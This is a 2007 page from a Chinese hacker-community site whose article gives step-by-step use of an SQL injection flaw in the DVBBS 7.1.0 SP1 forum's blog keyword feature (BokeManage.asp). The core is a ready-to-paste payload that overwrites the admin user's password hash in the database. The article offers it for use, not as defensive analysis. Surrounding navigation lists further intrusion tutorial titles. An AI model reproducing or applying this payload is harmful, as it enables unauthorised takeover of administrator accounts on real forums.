通行证│用户名:
密码:
验证码:
电信
┊
网通
┊
铁通
┊
移动
在线
人
文章搜索:
热门搜索:
红客
黑鹰
红客技术
安全动画
红客培训
首页
文章
软件
动画
资源
励志
论坛
邮箱
会员
军事
科技
博客
爱心红客
最近更新
800g资源
业内新闻
漏洞公告
病毒公告
电脑知识
网络知识
菜鸟入门
攻防教程
黑客攻防
安全编程
工具使用
综合安全
个人安全
安全相关
Q Q安全
原创精华
红客人物
站内事件
您现在的位置:
爱国者安全网
>>
文章类
>>
红客教程
>>
攻防教程
>> 文章正文
DVBBS 7.1.0 SP1博客远程注入漏洞
责任编辑:水土不服 更新日期:2007-10-23
漏洞
文件:BokeManage.asp
受影响版本:DVBBS <= 7.1.0 sp1 SQL版
利用方法 (转自守护天使's Blog):
注册会员→ 进入管理博客→关健字设置
随便填
再编辑关健字
上面几个还是随便填写。。
在第三个,也就是连接地址这里写入语句
123123'where 1=0;update dv_user set userpassword='469e80d32c0559f8' where username='admin'--
上一篇文章:
清理你入侵后的三个重要痕迹
下一篇文章:
利用php.exe进行入侵
最近更新
爱国者安全网2007年度优秀版主评选
瑞星公司01月11日发布 每日计算机病毒及木马播报
破解博彩神助(专注彩票) V2.8.01
推荐:跨站脚本执行漏洞代码的六点思路
Windows系统下的远程堆栈溢出 实战篇
Windows系统下的远程堆栈溢出 原理篇
MsSQLServer是如何加密口令的
浅谈国内的渗透评估过程
Dvbbs8.1 0DAY(通杀Access和mssql版本)
微软:我们的代码比赛门铁克更安全
热门文章
提醒:“求职信”病毒1月6日发作
两条“蠕虫”蠢蠢欲动
5“网银大盗”狂盗储户14万 武汉男子被判10年
“木马事件”终告结束 英语学习网重获新生
搜索引擎不再喜欢新米,并非只是CN米
蠕虫"威金"新变种 "小熊猫"屠宰多个计算机系统
元旦上网谨防“Real蛀虫” 通过视频文件传播
入侵工具Knark的分析及防范
认清本质 计算机病毒防治常遇问题
饶过现代Anti-Rookit工具的内核模块扫描(ZT)
精彩专题
